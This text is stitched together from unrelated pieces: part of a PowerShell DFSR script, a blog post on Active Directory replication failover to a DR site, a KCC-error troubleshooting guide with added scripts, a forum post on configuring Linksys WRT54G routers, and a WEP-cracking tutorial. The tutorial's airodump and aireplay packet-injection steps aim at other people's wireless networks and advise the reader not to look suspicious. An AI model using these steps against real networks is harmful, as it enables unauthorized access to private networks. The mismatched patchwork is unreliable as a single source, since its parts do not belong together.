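    foreach ($m in $messages) {
        if ($m -match 'Count:\s*(\d+)') { $count = [int]$Matches[1] }
    }

    [pscustomobject]@{
        FolderName    = $FolderName
        ReturnedItems = $items.Count      # capped at 100 by the cmdlet
        BacklogCount  = $count            # parsed from the Verbose stream
    }
}

Get-BacklogCount                  # ReturnedItems 100, BacklogCount 46314
Get-BacklogCount -TotalCount 0    # ReturnedItems 0,   BacklogCount 0
```

With the real module, replace the Get-FakeBacklog call with Get-DfsrBacklog and its parameters; the capture and parsing logic stays the same.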

Disaster Recovery Site and Active Directory (Part 3 of 3)

Welcome to part 3 of the series… hopefully you have enjoyed the first two parts where we have discussed client logon and clients failover between Domain Controllers and sites.

In the last part of the series we’re going to discuss Domain Controller replication failover between a Hub, Branch and DRP sites and different scenarios when doing so.

While talking about AD replication, it's important to note that Active Directory replication usually isn't considered the most critical service in the environment, and I absolutely agree. An environment can keep working when Active Directory replication is not working. Obviously, having Active Directory not replicating for long periods of time may cause issues, inconsistencies and other problems (long period => Tombstone Lifetime), but having AD not replicating in the middle of the night wouldn't get me out of bed running to my computer in order to fix the issue. On the other hand, I would go and do that first thing in the morning.

Now back to our environment. Again, we'll start with the simplest scenario, one Domain Controller in each site:
In our environment we have two Branch sites (Branch and Branch2) which are connected to the HUB site, each with a site link cost of 100.
The HUB site is connected to the DRP site with a site link cost of 10. Bridge All Site Links (BASL) is enabled in the environment. Having said that, an attempt to calculate the routes in the environment would result in the following (ordered by cost):
From Branch
1. Branch –> Hub = 100
2. Branch –> DRP = 110 (Branch –> HUB –> DRP).
3. Branch –> Branch2 = 200 (Branch –> HUB –> Branch2)

From Branch2
1. Branch2 –> HUB = 100
2. Branch2 –> DRP = 110 (Branch2 –> HUB –> DRP)
3. Branch2 –> Branch = 200 (Branch2 –> HUB –> Branch).

(A short reminder to make things clearer: BASL – Bridge All Site Links, means all site links are transitive. More information on BASL and AD replication topology can be found here –

In that scenario it’s obviously expected that the Branch sites (Branch and Branch2) would failover to the DRP site if the HUB site fails, instead of failing over to each other. (A matter of cost calculation, based on the table mentioned Branch –> DRP is cheaper than Branch –> Branch2).
So let’s fail the DC in the HUB site…

Running repadmin /showrepl on Child-DC04 would show we already have several failed attempts to replicate with the Domain Controller in the HUB site:

So the question is:
What are we waiting for?
Well… the answer is this:
IntersiteFailuresAllowed
Value: Number of failed attempts
Default: 1

MaxFailureTimeForIntersiteLink (sec)
Value: Time that must elapse before being considered unavailable, in seconds
Default: 7200 (2 hours)

(All described here – and
Basically, we'll wait for 2 hours before the source DC for replication is considered stale. So in our scenario, when we have failed the DC in the HUB site, it would take 2 hours from the last replication attempt for the DCs in the Branch sites to consider the DC in the HUB site stale.
After the time and the number of failures have elapsed we will get the following event:
Event ID 1308, stating that “The Knowledge Consistency Checker (KCC) has detected that successive attempts to replicate with the following directory service has consistently failed.” and that “The Connection object for this directory service will be ignored, and a new temporary connection will be established to ensure that replication continues. Once replication with this directory service resumes, the temporary connection will be removed. “
And a short while later we have received Event ID 2053: “A new connection has been created to address site connectivity issues.”


Looking at our environment's Visio diagram now would show (as expected):
Child-DC03 and Child-DC04 have created failover connection objects with Child-DC02, which is located at the DRP site, and vice versa, Child-DC02 has created failover connection objects with the DCs at the Branch and Branch2 sites.
So how long did this process take?
Well – we need three events to take place:
1. At least one replication attempt has to occur. Meaning, if the link to the HUB site failed at 3PM but the replication schedule on the site link is configured to replicate only at 1AM, we wouldn't even try to replicate before that time... so how would we know the site link has failed?!
2. After we have at least one failed replication attempt (the number is stated in the IntersiteFailuresAllowed registry value) we begin counting the failure time, as stated in the "MaxFailureTimeForIntersiteLink (sec)" registry value.
3. After the MaxFailureTimeForIntersiteLink has elapsed we need the KCC to run (which by default occurs every 15 minutes).

So it very much depends on the environment how long it would take the failover connection objects to be created.

What can I do to make it faster?
First of all, put things in perspective!
If you replicate once in 24 hours, how bad can it be to be 48 hours without replication? Like I mentioned at the beginning of the post, Active Directory not replicating would not get me running anywhere; it would just be one of those things on the TODO list (unless obviously it's a symptom of another issue, like all DCs have crashed and no one in the organization can work... well... I wouldn't consider that a replication problem to be honest, but that's a matter of semantics, because I can see there's a replication issue there among other problems).
If you still feel the failover time is not good enough and you need to expedite the failover, you can set the "MaxFailureTimeForIntersiteLink (sec)" value to a lower value.
Again from
Modifying the thresholds for excluding nonresponding servers requires editing the following registry entries in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters, with the data type REG_DWORD. You can modify these values to any desired value as follows:
For replication between sites, use the following entries:

  • IntersiteFailuresAllowed
    Value: Number of failed attempts
    Default: 1
  • MaxFailureTimeForIntersiteLink (sec)
    Value: Time that must elapse before being considered unavailable, in seconds
    Default: 7200 (2 hours)

You will have to perform this on every DC in every Branch site (as those are the ones counting the failures).
You also need to take care when reducing this, as a very low value for this setting may cause false positives when failing over between DCs, and since a failover can be an expensive operation we want to minimize false positives as much as possible.
Note: Whatever you do, don't go creating manual connection objects! Manage the KCC and the topology of the environment to match your requirements; don't override it with manual connection objects.
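Because the values have to be checked on every branch DC and a low MaxFailureTimeForIntersiteLink trades failover speed for false positives, here is an added audit helper (not the author's code) that reads both values from the registry path above on each DC and flags settings below an assumed review threshold; Child-DC03 is the post's branch DC, $MinSeconds is a hypothetical threshold.

```powershell
# Added example, not from the original post. Reads the two NTDS\Parameters values
# the post describes from each branch DC, substitutes the documented defaults when
# a value is absent, and flags values below $MinSeconds (an assumed review
# threshold, not a Microsoft figure) as a false-positive risk.
function Get-IntersiteFailoverSetting {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,   # branch DCs doing the counting
        [int]$MinSeconds = 900
    )

    $probe = {
        $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
        $p   = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        $failures = $p.IntersiteFailuresAllowed
        $seconds  = $p.'MaxFailureTimeForIntersiteLink (sec)'
        [pscustomobject]@{
            # An absent value means the default quoted in the post is in effect
            IntersiteFailuresAllowed       = if ($null -ne $failures) { [int]$failures } else { 1 }
            MaxFailureTimeForIntersiteLink = if ($null -ne $seconds)  { [int]$seconds }  else { 7200 }
            ExplicitlySet                  = ($null -ne $failures) -or ($null -ne $seconds)
        }
    }

    Invoke-Command -ComputerName $ComputerName -ScriptBlock $probe |
        ForEach-Object {
            # Lower value = faster failover but more false positives (see the post)
            $_ | Add-Member -NotePropertyName FalsePositiveRisk `
                            -NotePropertyValue ($_.MaxFailureTimeForIntersiteLink -lt $MinSeconds) `
                            -PassThru
        } |
        Select-Object PSComputerName, IntersiteFailuresAllowed,
                      MaxFailureTimeForIntersiteLink, ExplicitlySet, FalsePositiveRisk
}

# Usage (needs WinRM access to the DCs): one row per branch DC
Get-IntersiteFailoverSetting -ComputerName 'Child-DC03' | Format-Table -AutoSize
```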

Failing back
Usually that's not a concern, but this question often comes up: what happens when the failed DC comes back online?
Well – KCC is aware of that when we have a successful replication attempt with the failed DC (and again, that’s based on our replication topology, schedule and times).
So the next time KCC is run we will receive event 1129 stating “To improve the replication load of Active Directory Domain Services, a replication connection from the following source directory service to the local directory service was deleted. “

So those temporary failover connection objects created for failover to the DR site are automatically deleted when the “best” DC (in our case – the DC at the HUB site) comes back online.

So now that we know how failover works lets just briefly discuss the following scenario:
Two Domain Controllers in the HUB site

Let's imagine that the physical site link between the Branch site and the HUB site has failed (to simulate that, I'll shut down the Active Directory Domain Services service on both DCs in the HUB site, Child-DC01 and Child-DC04).
So the first thing that occurs is exactly as previously: Child-DC03 (Branch) identifies that the current replication partner in the HUB site (Child-DC01) has failed, and Event ID 1308 is generated on Child-DC03 (just as previously) stating "The Knowledge Consistency Checker (KCC) has detected that successive attempts to replicate with the following directory service has consistently failed." and "The Connection object for this directory service will be ignored, and a new temporary connection will be established to ensure that replication continues. Once replication with this directory service resumes, the temporary connection will be removed."

Now is the different part:
The new connection object that is generated is with Child-DC01 (HUB):
Event ID 2054 stating:
“The Knowledge Consistency Checker (KCC) created a new bridgehead failover connection because the following bridgeheads used by existing site connections were not responding or replicating. 
CN=NTDS Settings,CN=CHILD-DC04,CN=Servers,CN=HUB,CN=Sites,CN=Configuration,DC=trdemo,DC=local”
was generated on Child-DC03.
So Child-DC03 has failed over from Child-DC01 to Child-DC04. Is this the expected behavior???
The answer is yes! If you scroll back up you will note that I was stating all the time that we identify failed Domain Controllers. There is no possible way of identifying site link failures. So in terms of Active Directory replication, a failed site is a site where all DCs are not responsive.
And that's an important thing to remember. So in this scenario, where we have two Domain Controllers in the HUB site, we count the IntersiteFailuresAllowed and "MaxFailureTimeForIntersiteLink (sec)" values for each Domain Controller in the site.
So with this scenario, if the MaxFailureTimeForIntersiteLink is the default 2 hours, we are talking 4 hours for failover to the DRP site.
Now let’s talk specifically about our test environment:
I have set the "MaxFailureTimeForIntersiteLink (sec)" value to 300 seconds (decimal), i.e. 5 minutes:
Meaning that 5 minutes of replication failures on an inter-site connection object will cause the source Domain Controller to be considered failed.
So we have Child-DC01 and Child-DC04 failing since (repadmin /showrepl output on Child-DC03):
******* 8 CONSECUTIVE FAILURES since 2011-12-11 12:58:52

So, taking the times we have configured:
12:58:52 + 5 minutes (the MaxFailureTimeForIntersiteLink time) = 13:03:52. So at 13:03:52 Child-DC04 will be considered stale, after which we'll wait for the KCC to run.
Since the KCC runs every 15 minutes, it depends on where in the 15-minute timeframe we catch the KCC.
The KCC is generating Event 1308 stating that it has identified the failed Domain Controller, followed by Event 2052 stating a new connection object has been created with Child-DC01 (as expected we try to failover between DCs in the HUB site):
Next time the KCC is running (which is 15 minutes later @ 13:41:17) we still try to establish a connection object with Child-DC01 (or new selected server at the HUB site).
Next time KCC is run (that’s at 13:56:17) we have identified Child-DC01 as a stale server:
Event ID 1307 stating that “The Knowledge Consistency Checker (KCC) has detected that attempts to establish a replication link with the following directory service has consistently failed. “
And only then we consider the HUB site as stale!
And we have Event ID 1566 to support that:
All directory servers in the following site that can replicate the directory partition over this transport are currently unavailable. 

So now we can failover to the DRP site:
Event ID 2053 is generated, stating that we have created a new connection object for failover, and this time it’s with Child-DC02 located at the DRP site:
So overall the process took us about 1 hour to failover, and that’s with the MaxFailureForIntersiteLink set to a very low value (5 minutes). So with the default setting of 2 hours you can expect 4-4.5 hours (depending on KCC intervals and where you catch them) to failover between a branch site and a HUB site containing two Domain Controllers.

How can we make the process faster?
Just as previously – Take things in perspective. Ask – what happens if my environment doesn’t replicate for 5 hours? Do I even need to change anything?
If you do need to decrease the MaxFailureTimeForIntersiteLink value, again take into consideration the false positives which may result from setting this value too low.

Now, if you feel like asking "so what happens if I have 3 DCs in the HUB site?", just use your own logic (let me give you a hint: we wait for MaxFailureTimeForIntersiteLink for each DC).

So hopefully it makes sense... now, after I completely broke my lab environment while writing this post, I think I'm going to spend some time setting things back to normal (e.g. default).
Hope you enjoyed it and that it will make some more sense when troubleshooting, planning or testing your DRP scenarios.
And let me end on a cheerful note: a DRP site is not a DR Plan!!! In other words: now that you've got your DR site all sorted out, it's time to go and test your other DR scenarios!
(And our colleagues from the UK have nicely listed all the scenarios in one place –

Hope we all never need it!


Sites begins logging Knowledge Consistency Checker (KCC)

I’m a Support Escalation Engineer on the Directory Services Support team.

I’m going to discuss a recent trend I’ve seen where Active Directory Replication appears to be fine but one DC only in one (or more) sites begins logging Knowledge Consistency Checker (KCC) Warning and Error events in the Directory Service event log. I included sample events below.

For those not familiar with the KCC, it is a distributed application that runs on every domain controller. The KCC is responsible for creating the connections between domain controllers and collectively forms the replication topology. The KCC uses Active Directory data to determine where (from what source domain controller to what destination domain controller) to create these connections.

In some cases these errors are logged all the time and in others they are logged at regular intervals and they clear on their own only to reappear like clockwork. Typically other DCs in the same site(s), perhaps even in the whole forest, report no KCC errors at all. In some cases the DC logging these errors have a small number of connection objects compared with their peer DCs in the same site:

Event Type: Warning 
Event Source: NTDS KCC 
Event Category: (1) 
Event ID: 1566 
Date: 5/14/2008 
Time: 1:51:23 PM 
Computer: DC1X 
All domain controllers in the following site that can replicate the 
directory partition over this transport are currently unavailable.

Directory partition: 
CN=IP,CN=Inter-Site Transports,CN=Sites,CN=Configuration,DC=contoso,DC=com


Event Type: Error 
Event Source: NTDS KCC 
Event Category: (1) 
Event ID: 1311 
Date: 5/14/2008 
Time: 1:51:23 PM 
Computer: DC1X 
The Knowledge Consistency Checker (KCC) has detected problems with the 
following directory partition.

Directory partition: 

There is insufficient site connectivity information in Active Directory 
Sites and Services for the KCC to create a spanning tree replication topology. 
Or, one or more domain controllers with this directory partition are unable 
to replicate the directory partition information. This is probably due to 
inaccessible domain controllers.

User Action 
Use Active Directory Sites and Services to perform one of the following 
– Publish sufficient site connectivity information so that the KCC can 
determine a route by which this directory partition can reach this site. This is 
the preferred option. 
– Add a Connection object to a domain controller that contains the directory 
partition in this site from a domain controller that contains the same 
directory partition in another site.

If neither of the Active Directory Sites and Services tasks correct this 
condition, see previous events logged by the KCC that identify the 
inaccessible domain controllers.

In some cases this event is also seen; it suggests name resolution is working but a network port is blocked:

Event Type: Warning 
Event Source: NTDS KCC 
Event Category: (1) 
Event ID: 1865 
Date: 5/14/2008 
Time: 1:51:23 PM 
Computer: DC1X 
The Knowledge Consistency Checker (KCC) was unable to form a complete 
spanning tree network topology. As a result, the following list of sites 
cannot be reached from the local site.


For more information on ISTG and Connectivity issues, see KB 944351 AD replication is not working with event 1865 logged.
If you encounter this issue, it could be that the DC logging the errors is hosting the Intersite Topology Generator (ISTG) role for its site. This role is responsible for maintaining all of the inter-site connection objects for the site. The ISTG polls each DC in its site for connection objects that have failed, and if failures are reported by the peer DCs the ISTG logs these events indicating something is not right with connectivity.

For those wondering what these events mean here is a quick rundown:

The 1311 event indicates the KCC couldn’t connect up all the sites.
The 1566 event indicates the DC could not replicate from any server in the site identified in the event description.
When logged, the 1865 event contains secondary information about the failure to connect the sites and tells which sites are disconnected from the site where the KCC errors are occurring.
Ok, I’ll get to the point and explain how to identify the root cause and correct this. These errors are pointing to a topology or a connectivity issue. Either there are not enough site links to connect all the sites or more likely network connectivity is failing for a number of reasons.

If your network is not fully routed (the ability for any DC in the forest to perform an RPC bind to every other DC in the forest) make certain Bridge All Sites Links (BASL) is unchecked. If BASL is unchecked Site Links and/or Site Link Bridges must be configured. Site Links and Site Link Bridges provide the KCC with the information it needs to build connections over existing network routes. If the network is fully routed and you have BASL checked, fine.

While the network routes may exist the ports needed for Active Directory to replicate must not be restricted.

The assumption of this blog is these errors continue to be logged even though the site listed in the 1566 event has been added to a site link object and AD topology is correctly configured.

To locate the source of the KCC events and identify the root cause, you need to execute the following commands while the KCC events are being logged.

1) Identify the ISTG covering each site by running this command:

repadmin /istg

The output will list all sites in the forest and the ISTG for each site:

repadmin running command /istg against server localhost

Gathering topology from site Default-First-Site-Name (

Site     ISTG
====     ====
SiteX    DC1X
SiteY    DC1Y

NOTE: Determine from the output if the DC logging these events (DC1X) is the ISTG or not.

2) If the DC logging the events is the ISTG any one of the DCs in the same site as this ISTG could have connectivity issues to the site identified in the 1566 event. You can identify which DC(s) are failing to replicate from the site identified in the 1566 event by running this command which targets all DCs in the site that the ISTG logging the errors resides in. For example, DC1X is logging the events and it is the ISTG for siteX. To identify which DCs in siteX are failing to replicate from siteY run this command:

repadmin /failcache site:siteX >siteX-failcache.txt

The failcache output shows two DCs in siteX:

repadmin running command /failcache against server 

==== KCC CONNECTION FAILURES ============================
(none)

==== KCC LINK FAILURES ==================================
SiteY\DC1Y
    DC object GUID: 7c2eb482-ad81-4ba7-891e-9b77814f7473
    No Failures.

repadmin running command /failcache against server 

==== KCC CONNECTION FAILURES ============================
(none)

==== KCC LINK FAILURES ==================================
SiteY\DC1Y
    DC object GUID: 7c2eb482-ad81-4ba7-891e-9b77814f7473
    46 consecutive failures since 2008-08-12 22:14:39.
SiteZ\DC1Z
    DC object GUID: fh3h8bde-a928-466a-97b0-39a507acbe54
    No Failures.

The output above identifies the Destination DC (DC2X) in siteX that is failing to inbound replicate from siteY. In some cases the DC name is not resolved and shows as a GUID. If the DC name is not resolved, determine the hostname of the Destination DC by pinging the fully qualified CNAME:


NOTE: DC2X may or may not be logging Error events in its Directory Services event log like the DC1X the ISTG is.

3) Logon to the Destination DC identified in the previous step and determine if RPC connectivity from the Destination DC to the Source DC (DC1Y) is working.

repadmin /bind

If “repadmin /bind DC1Y” from the Destination DC succeeds:
Run “repadmin /showrepl ” and examine the output to determine if Active Directory Replication is blocked. The reason for replication failure should be identified in the output. Take the appropriate corrective action to get replication working.

If “repadmin /bind DC1Y” from the Destination DC fails:
Verify firewall rules are not interfering with connectivity between the Destination DC and the Source DC. If the port blockage between the Destination DC and the Source DC cannot be resolved, configure the other DCs in the site where the errors are logged to be Preferred Bridgeheads and force KCC to build new connection objects with the Preferred Bridgeheads only.

NOTE: Running "repadmin /bind DC1Y" from the ISTG logging the KCC errors may reveal no connectivity issues to DC1Y in the remote site. As noted earlier, the ISTG is responsible for maintaining inter-site connectivity and may not be the DC having the problem. For this reason the command must be run from the Destination DC that repadmin /failcache identified as failing to inbound replicate.

A successful bind looks similar to this:

C:\>repadmin /bind DC1Y 
Bind to DC1Y succeeded. 
NTDSAPI V1 BindState, printing extended members. 
    bindAddr: DC1Y 
Extensions supported (cb=48): 
    BASE                             : Yes 
    ASYNCREPL                        : Yes 
    REMOVEAPI                        : Yes 
    MOVEREQ_V2                       : Yes 
    GETCHG_COMPRESS                  : Yes 
    DCINFO_V1                        : Yes 
    KCC_EXECUTE                      : Yes 
    ADDENTRY_V2                      : Yes 
    DCINFO_V2                        : Yes 
    CRYPTO_BIND                      : Yes 
    GET_REPL_INFO                    : Yes 
    STRONG_ENCRYPTION                : Yes 
    DCINFO_VFFFFFFFF                 : Yes 
    TRANSITIVE_MEMBERSHIP            : Yes 
    ADD_SID_HISTORY                  : Yes 
    POST_BETA3                       : Yes 
    GET_MEMBERSHIPS2                 : Yes 
    NONDOMAIN_NCS                    : Yes 
    XPRESS_COMPRESSION               : Yes 
    DRS_EXT_ADAM                     : No 
Site GUID: stn45bf5-f33f-4d53-9b1b-e7a0371f9a3d 
Repl epoch: 0 
Forest GUID: idk4734-eeca-11d2-a5d8-00805f9f21f5 
Security information on the binding is as follows: 
    SPN Requested:  LDAP/DC1Y 
    Authn Service:  9 
    Authn Level:  6 
    Authz Service:  0

4) If these events occur at specific periods of the day or week and then resolve on their own, verify DNS Scavenging is not set too aggressively. It could be that DNS Scavenging is so aggressive that SRV, A, CNAME and other valid records are purged from DNS, causing name resolution between DCs to fail. If this is the behavior you are seeing, verify the scavenging settings on these DNS zones:
Scavenging settings also need to be checked on child domains if the Source or Destination DCs are in child domains.
Example: if Scavenging is set this way, the outage will occur every 24 hours:

Non-refresh period: 8 hours 
Refresh period: 8 hours 
Scavenging period: 8 hours

To correct this change the Refresh and Non-refresh periods to 1 day each and set scavenging to 3 days. See Managing the aging and scavenging of server data on Technet to configure these settings for the DNS Server and/or zones.
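Step 2 of the procedure above is the one that actually pins down the misbehaving Destination DC, so here is an added parser (not the author's code) for the repadmin /failcache layout shown earlier; $SampleFailcache is a constructed transcript in that layout with placeholder server names, and Get-FailingReplicationPartner lists only the source partners that show consecutive failures.

```powershell
# Added example, not part of the original post. $SampleFailcache is a constructed
# transcript in the layout of the failcache output shown above; DC names, GUIDs
# and timestamps are placeholders.
$SampleFailcache = @'
repadmin running command /failcache against server DC1X.contoso.com

==== KCC CONNECTION FAILURES ============================
(none)

==== KCC LINK FAILURES ==================================
SiteY\DC1Y
    DC object GUID: 7c2eb482-ad81-4ba7-891e-9b77814f7473
    No Failures.

repadmin running command /failcache against server DC2X.contoso.com

==== KCC CONNECTION FAILURES ============================
(none)

==== KCC LINK FAILURES ==================================
SiteY\DC1Y
    DC object GUID: 7c2eb482-ad81-4ba7-891e-9b77814f7473
    46 consecutive failures since 2008-08-12 22:14:39.
SiteZ\DC1Z
    DC object GUID: fh3h8bde-a928-466a-97b0-39a507acbe54
    No Failures.
'@

function ConvertFrom-FailcacheOutput {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Text)

    $entries     = @()
    $destination = $null   # DC the current block was collected from
    $section     = $null   # 'Connection' or 'Link'
    $entry       = $null   # source partner currently being described

    foreach ($line in $Text -split "`r?`n") {
        switch -Regex ($line) {
            '^repadmin running command /failcache against server (\S+)' {
                $destination = $Matches[1]; $entry = $null; continue
            }
            '^==== KCC (CONNECTION|LINK) FAILURES' {
                $section = if ($Matches[1] -eq 'LINK') { 'Link' } else { 'Connection' }
                $entry = $null; continue
            }
            '^(\S+)\\(\S+)\s*$' {
                # "Site\DC" header line that starts a partner entry
                $entry = [pscustomobject]@{
                    Destination = $destination
                    Section     = $section
                    SourceSite  = $Matches[1]
                    SourceDC    = $Matches[2]
                    Guid        = $null
                    Failures    = 0
                    Since       = $null
                }
                $entries += $entry; continue
            }
            '^\s+DC object GUID:\s+(\S+)' {
                if ($entry) { $entry.Guid = $Matches[1] }; continue
            }
            '^\s+(\d+) consecutive failures since (.+?)\.?\s*$' {
                if ($entry) { $entry.Failures = [int]$Matches[1]; $entry.Since = $Matches[2] }
                continue
            }
            # "No Failures." and "(none)" leave Failures at 0
        }
    }
    $entries
}

function Get-FailingReplicationPartner {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Text)
    ConvertFrom-FailcacheOutput -Text $Text |
        Where-Object { $_.Failures -gt 0 } |
        Select-Object Destination, Section, SourceSite, SourceDC, Failures, Since
}

# On the sample this yields one row: DC2X.contoso.com failing from SiteY\DC1Y, 46 failures
Get-FailingReplicationPartner -Text $SampleFailcache | Format-Table -AutoSize

# Against a live site (command from the post): run it on the ISTG's site and parse the text
# Get-FailingReplicationPartner -Text (repadmin /failcache site:siteX | Out-String)
```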

Hopefully this clears up the mysterious KCC errors on that one DC.

– David Everett

AD Replication, David Everett

Chris-au Chris-au 8 Oct 2010 2:15 AM
great article, thanks.


WEP cracking [In 10mins] + Configure Linksys WRT54G Wi-Fi

Configure Linksys WRT54G Wi-Fi

1) Go with the browser to
2) Username blank; password: the one you set when you were running the wizard from the CD.
3) Wireless section -> Wireless Security
There you choose the encryption type and a password. I don't know which is the best; I personally have WPA2 Personal and AES.
4) Put that same configuration on the machines that connect wirelessly.

Linksys BEFSR41 V3 and WRT54GS without Internet:

Mode 1
Connect it directly from the modem output to the WAN port of the WRT54GS
Go into the WRT54GS and tell it you connect through a static IP, so that it looks something like this.

static IP connection configuration.
ip address:
gateway:

Configure the modem in bridge mode.
go into the WRT54GS and in the connection or WAN configuration set PPPoE and give it your Internet username and password

configure the modem and the WRT54GS with the same IP range
DHCP: from to


You can connect fine with any of the 3 methods; the only thing, always remember to put a password on the wireless.


I am using this firmware, HyperWRT 2.1b1 + Thibor15c, on 2 WRT54GL routers and so far I have had no problems. I use them as WDS + AP and they work very well (the factory firmware does not allow WDS). It honestly seems like a different router with this firmware.

  • Major Projects
    • DD-WRT[4] Paid and free versions available. (Linux/GPL)
    • HyperWRT Thibor[5] Firmware based on stock WRT54GS firmware, HyperWRT +tofu and other additions.
    • OpenWrt[6] Firmware with a JFFS2 file system for package management. (Linux/GPL)
    • Sveasoft[7] Paid and free versions available. Latest versions available via subscription.
    • Tomato[8] Firmware featuring a number of web innovations such as Ajax and SVG graphs. The Tomato Manual is available at Wikibooks. (Linux/GPL)
  • Minor projects
    • BatBox – RAM based distribution for experimenting, does not change firmware
    • Bluebox – Automatic open Internet scanning and bridging software that runs on WRT54G with OpenWRT.
    • Chillispot – Captive portal software that runs on WRT54G and other platforms, available under GPL
    • Earthlink‘s IPv6 Firmware – IPv6 feature added to original Linksys firmware (beta-test version)
    • EWRT – Enhanced WRT, with integrated captive portal based on NoCatSplash
    • FON – Chillispot-based worldwide Hotspot network. After unsuccessfully attempting to develop a version that supports 2 SSIDs (one private, one public), FON abandoned the WRT54G series, and now distributes a router called La Fonera, which does support 2 SSIDs.
    • FreeWRT – Experimental firmware based on OpenWrt.
    • Freifunk – German software supports wireless mesh networks with OLSR, based on OpenWrt
    • Meraki – Mesh Networking Wifi AP developed thru Roofnet project, based on OpenWrt.[1]
    • OpennetFirmware – Firmware based on OpenWrt and parts of Freifunk.
    • PacketProtector – OpenWrt-based security distribution that includes IDS, IPS, VPN, and web antivirus capabilities
    • TinyPEAP – Secure wireless authentication feature added to Linksys firmware
    • WiFi-Box[9] – (no documentation available as of January 2006)
    • Neighbornode
    • Tarifa[10] – Based on stock WRT54GL firmware.
    • WiFiDog Captive Portal – WiFi Dog by Ile Sans Fil, a Captive Portal software that runs on the OpenWrt platform
    • WifiTastic[11] – Hotspot solution for home or small business use. Features credit card billing. Runs on the OpenWrt platform
    • A project which uses freifunk firmware with chillispot captive portal and authentication.
    • X-Wrt End user extensions to OpenWrt – provides a new web based management interface to OpenWrt. (Linux/GPL)
  • Deprecated projects (no longer maintained)
    • HyperWRT – Original power boost firmware project by Avenger 2.0 to stay close to official WRT54G and WRT54GS firmware but add features such as transmit power, port triggers, scripts, telnet, etc.
      • HyperWRT +tofu – Based on stock WRT54GS firmware, HyperWRT and some additions.
      • Rupan HyperWRT – Based on stock WRT54G firmware and HyperWRT.

I have 3 machines connected all the time, plus the ones I add to test or repair them.

Here you test the firewall


In the versions after the one I use, port 113 is Closed instead of stealthed; that is because some Internet providers need that configuration so that mail is sent properly and communication takes less time.

Any questions you have, post them.

WEP cracking [In 10mins]

[This tutorial is based on the Whoppix Flash tutorial on WEP cracking, just in more detail

and ]


Ok, this is a tutorial explaining how to crack most WEP-encrypted Access Points out there. The tools used will be as follows:

Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1

As for wireless cards, I recommend any Prism, Orinoco, or Atheros based card (I used the D-Link 650 Rev.1a).

Getting Started:

Let's see. The first thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit). Next you are going to want to load up your favourite live CD (I used Whoppix 2.7 final) or Linux OS, then stumble across an encrypted WLAN; use Kismet to do so. Make sure you have configured your kismet.conf file correctly to be able to use your card (locate your kismet.conf file and open it with your favourite text editor, I used pico):

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

^^ That is an example of part of my kismet.conf. Initially that was wrong for me; I had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your card's chipset, have a good Google on the model number of your card or try checking here . A full list of supported chipsets can be found on the Kismet website under Documentation.

Changed kismet.conf:

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

Save the changes you make, go back to a terminal and run 'kismet'; it should load up if you configured it properly. Once you have got Kismet going, have a good stumble around your area to see if a WLAN has WEP enabled: Kismet should have a column near the ESSID titled 'W'; if WEP is enabled it will show a Y, if not it will show an N.

Going in for the kill:

So now you have got a target. Make sure you don't look suspicious and that you have at least 15 mins worth of battery life left Razz. Make sure you know the channel the Access Point is on (under the CH column in Kismet) and also the MAC address of the Access Point, by hitting 's' (to sort), then scrolling to the desired Access Point and then typing 'i', which gives you detailed info on the Access Point selected.

First off, you are going to want to set your wireless card to the right mode; which commands you have to use depends on your chipset:

If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2

If you use wlan-ng, run
./ start wlan0 [comes with AirePlay2.2]

Otherwise run:
iwconfig ath0 mode Monitor channel
ifconfig ath0 up

Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
[version crap]
usage: ./airodump [mac filter]

./airodump wlan0 linksys

The MAC filter is used when you have more than one Access Point on the same channel at once. So say you have 'jim_home' and 'linksys', both ESSIDs of access points on channel 11: you would grab the MAC address of the Access Point in Kismet, by hitting 's' (to sort), then scrolling to the desired Access Point and then typing 'i', which gives you detailed info on the Access Point selected. Ok, so now you have got a stream of packets from your target; you see the IV column, those are what's known as 'weak key' packets, and we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a 'weak key' packet from the network we are targeting and flood the Access Point with it, in the hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now, in your other terminal window, 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):

capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type – default: 2 = data
-v subt : fc, subtype – default: 0 = normal
-t tods : fc, To DS bit – default: any
-f fromds : fc, From DS bit – default: any
-w iswep : fc, WEP bit – default: 1
-y : don’t ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on

./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0

Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet, which aireplay will then ask you if you want to use to flood the Access Point with. When it asks you if it can use one of the packets, hit 'y' then return. If you flick back to your terminal with airodump running you should see the number of captured packets increase by a huge amount, and with that the IV packets should also be increasing pretty damn fast as well. If all went well, in about 10 mins you should have enough packets to dump into aircrack. Ok, so you want at least 400k+ IV packets (the more the better); once you have got a decent amount, hit 'control+c' in both terminal windows to terminate both aireplay and airodump, then 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):

aircrack 2.1 – (C) 2004 Christophe Devine
usage: ./aircrack [options]
